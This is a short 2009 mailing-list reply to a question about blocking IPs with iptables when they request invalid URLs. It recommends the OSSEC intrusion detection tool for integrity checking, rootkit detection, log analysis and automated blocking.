blocking ips with iptables accessing invalid URL

Aaron Bliss abliss at brockport.edu
Wed Jul 8 12:54:19 UTC 2009

You may wish to look into OSSEC ; will do integrity checking, rootkit
detection, event log correlation, has an excellent default rules base,
can accept just about any kind of logfile and decode it

http://www.ossec.net/wiki/index.php/Main_Page

It will also do what your looking for (OSSEC calls it active response).
  Setup time for a new install is about 5 minutes.

Aaron